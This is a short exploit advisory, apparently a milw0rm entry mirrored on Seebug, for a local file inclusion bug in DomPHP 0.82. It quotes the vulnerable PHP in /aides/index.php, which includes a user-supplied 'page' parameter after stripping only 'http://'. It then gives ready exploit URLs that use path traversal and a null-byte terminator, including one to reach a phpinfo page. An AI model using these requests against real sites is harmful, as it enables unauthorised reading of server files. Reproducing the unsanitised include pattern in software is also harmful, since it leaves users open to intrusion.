------------------------------------------------------------- ----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo -------- ------------------------------------------------------------- = Author : HouSSaMix From H-T Team = Script : DomPHP 0.82 = Download : http://www.domphp.com/download/ = BUG : Local File Inclusion = Vulnerable CODE : ~~~~~~~~~ /aides/index.php ~~~~~~~~~~~~~~~~~~~~~~ if (isset($_GET['page'])) { // On supprime le http:// si tentative de fraude. $page = str_replace("http://","",$_GET['page']); include("../aides/".$page.".html"); ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ = Exploit : http://Target/[path]/aides/index.php?page=[LFI]%00 = Get phpinfo => http://Target/[path]/info.php http://Target/[path]/aides/index.php?page=../info.php%00 ------------------------------------------------------------- ----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo -------- ------------------------------------------------------------- # milw0rm.com [2008-02-09]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论